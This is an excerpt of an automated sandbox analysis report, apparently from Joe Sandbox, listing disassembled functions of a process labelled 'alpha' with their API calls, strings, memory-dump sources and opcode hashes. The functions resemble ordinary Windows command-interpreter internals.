                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f803880b4beb2ad6873c314903c41a20bf742b864235e080ee83bf25c8da2de2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 861fd574786a2e4756fe876b0fe18680cfa6a53da05ebc2e1ab213a67e45e7a0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f803880b4beb2ad6873c314903c41a20bf742b864235e080ee83bf25c8da2de2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77E1BC21A0D34286FA64BB14AC743BBE6A0BF45B54FE45235DA0E072D1DF3CE8468320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB3410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $Application$System
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3538039442-1881496484
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ad73454984b7cbd2917102196f8b5b7e32f5d7517905a82e9587d1004ce2a304
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41518D36A08B4196EB20AB15BC206BBFAA1FF89B48F859235DE4E43794DF3DD445C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDD9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706ED048E), ref: 00007FF706EDDA58
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EDDAD6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EDDAFC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EDDB22
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706EDEAC5,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EC3A56
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF706EB51C4
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC823C: FindFirstFileExW.KERNELBASE ref: 00007FF706EC8280
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EC829D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: _get_osfhandle.MSVCRT ref: 00007FF706EC01C4
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC01D6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB4FE8: _get_osfhandle.MSVCRT ref: 00007FF706EB5012
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB5030
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EDDDB0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB5A2E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB59E4: _open_osfhandle.MSVCRT ref: 00007FF706EB5A4F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EDDDEB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EDDDFA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EDE204
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EDE223
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EDE242
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %9d$%s$~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3651208239-912394897
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8dbac1f41cc8d1ee0a9e4174b5dae10206383aba7879328c8d3774ef0290a21e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6426E32A0878286EB64BF24DC642FBA7A0FF85744F944136DB4D4BA99DF3CE5458720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COPYCMD$\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3989487059-1802776761
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b937e1f8b9b406542b2eaaecd17132087e1067d9823345af16ee3ae62f70ea2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F1D326B0878682EA20BB15DC652BBE3A0FF45B88F949135CE4E477A5EF3CE445C310
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC3140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 55602301-2548490036
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fbcd703ebd8b9031eaeb8506e8c6f4581c2cd31246848d5e683a77ab20023de4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BA16D36A1874296EB20AB14EC602BBB7A5FF84764FD04136DA5E03694EF3CE546C760
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3935429995-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6fb21c5007d68856894713246c8659905f2345a8b78e3383b22c75447c2fd86c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1361912AA1875286E714EF25EC245BAFBA4FF89F98F858135DE4A43790DF3CD4818710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB35B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 81e3db09224d82e964e09af5b54878f80e86fceaf7b64bf424c8e208c9c64ad0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B91AF3660978286EB24AF25DC202FEB6A0FF49759F845235DA4E47794EF3CD545C220
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBB0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandlememset$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3260997497-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 82bfcc47faf22433538619e7b0547c552e494b268131d71cf2db7bb0d1e1ffb9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3ED17032A08B4286EB24BB65DC611BFA2A1FF44BA4F945235DA1D477D4DF3CE846C360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC7FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: @P
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1801357106-3670739982
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d3a5ea9f339798fbd8f372587db7ef8c1cddc2dac312a775404632cd025d0db0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9413B32B04B45DAE710AF61D8642EEABA0FB89B58F844231DA1D43A98DF78D504C750
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB2220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1034426908-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c41fc352ef571df71f98268f3a65bca59e9b7dc09e2470cefabfbc33bfee4950
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3F18132A087828AEB64EF259C602FBA7A4FF45748F845235DB4E4B695DF38E605C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDAC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
